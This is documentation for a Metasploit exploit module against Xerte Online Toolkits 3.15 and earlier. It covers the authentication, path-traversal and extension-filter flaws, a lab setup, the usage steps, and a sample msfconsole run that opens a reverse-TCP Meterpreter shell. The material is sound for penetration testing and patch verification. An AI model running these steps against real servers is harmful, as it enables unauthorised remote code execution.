ContextQMD
Back to Metasploit Framework

Xerte Unauthenticated Mediaupload

documentation/modules/exploit/multi/http/xerte_unauthenticated_mediaupload.md

6.4.1395.1 KB
Original Source

Vulnerable Application

This module exploits authentication failure, extension blacklist, and path traversal vulnerabilities in Xerte Online Toolkits versions 3.15 (at commit 4e40f8030a2e3267267db7ce03e0ff57270be6f5 as they do not use patch versions) and earlier.

The vulnerabilities exists in the /editor/elfinder/php/connector.php endpoint which which fails to kill execution after redirecting unauthenticated users. A file with a php payload can be uploaded and then moved outside of a user's directory to the webroot by using the elfinder "rename" functionality. Because of an improper use of regex in the file extension filter, the file can be renamed to have a .php4 extension, thus allowing remote code execution.

Tested Xerte Online Toolkits versions 3.15, 3.14, and 3.13 on Ubuntu 24.04 and 3.15 on Windows 10.

Setup

See installation instructions

Update

bash
sudo apt update && sudo apt upgrade

Install XAMPP

Download XAMPP from https://sourceforge.net/projects/xampp/

bash
sudo ~/Downloads/xampp-linux-x64-8.2.12-0-installer.run

Install Xerte Online Toolkits

cd /opt/lampp/htdocs
sudo git clone https://github.com/thexerteproject/xerteonlinetoolkits
sudo mv xerteonlinetoolkits xt
cd xt
sudo git fetch --all
sudo git checkout -b master origin/master
sudo git checkout 4e40f8030a2e3267267db7ce03e0ff57270be6f5

Start Apache and MySQL via Xampp

To start the xampp management console:

bash
sudo /opt/lampp/manager-linux-x64.run

Then ensure Apache and MySQL are running.

Setup MySQL

bash
sudo /opt/lampp/bin/mysql
use mysql
CREATE USER 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES on *.* to 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
FLUSH PRIVILEGES;
exit

Setup Xerte

Navigate to http://localhost/xt/setup/

  1. Click "Install"
  2. Verify System Requirements are good.
  3. Click "Next"
  4. Run sudo chmod 777 /opt/lampp/htdocs/xt/{.,setup,USER-FILES,error_logs,import}
  5. Click "Next" until you get to /setup/page1.php
  6. Verify all Module Checks
  7. Enter the user information you created before "xerteadmin:password123"
  8. Ensure the database user info is same as before, click "Next"
  9. Create Admin Account "admin1:admin123"
  10. On page3.php scroll to bottom and select "Db" authentication in the "Choose an authentication method" dropdown
  11. Hit Save

Create Normal User

http://localhost/xt/index.php

Sign in as the admin created in previous step "admin1:admin123"

Users > Manage Db auth users

Login name: user1 First name: fName Last name: lName Password: user123 Email: <leave blank>

Hit "Create user" then logout

Create A Template

Sign into the new user at http://localhost/xt (or whatever the directory you created under htdocs is)

On the very right side of the application under "Project Templates" click the "Create" button under the "Xerte Online Toolkit" ribbon.

You should be prompted for a name for the new template. Use whatever name and click "Create" again. Close out of the Template editor that opens up. You can click "Cancel" or "Ok" when prompted to Publish the changes, doesn't matter which.

Verification Steps

  1. Start msfconsole
  2. use exploit/multi/http/xerte_unauthenticated_mediaupload
  3. set RHOSTS <target>
  4. set TARGETURI <uri to xerte> (e.g., xerteonlinetoolkits/)
  5. set LHOST <your_ip>
  6. set USERNAME <valid user>
  7. exploit

On success a meterpreter session will be started If no WEBROOT argument is provided, one is automatically detected and used

Options

WEBROOT

The full filepath to the application root. For example /var/www/html/

If not given, the module will try to detect the webroot from the setup/ endpoint.

Scenarios

Exploiting Xerte Online Toolkits to obtain Meterpreter Session

msf > use exploit/multi/http/xerte_unauthenticated_mediaupload
[*] Using configured payload php/meterpreter_reverse_tcp
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set rhosts 10.0.0.45
rhosts => 10.0.0.45
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set targeturi xt
targeturi => xt
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set webroot /opt/lampp/htdocs/xt
webroot => /opt/lampp/htdocs/xt
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set username user1
username => user1
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set lhost 10.0.0.218
lhost => 10.0.0.218
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > run
[*] Started reverse TCP handler on 10.0.0.218:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Meterpreter session 1 opened (10.0.0.218:4444 -> 10.0.0.45:40848) at 2026-04-24 10:35:38 -0400
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC' on the target
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC.txt' on the target
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/veYtVoJC.php4' on the target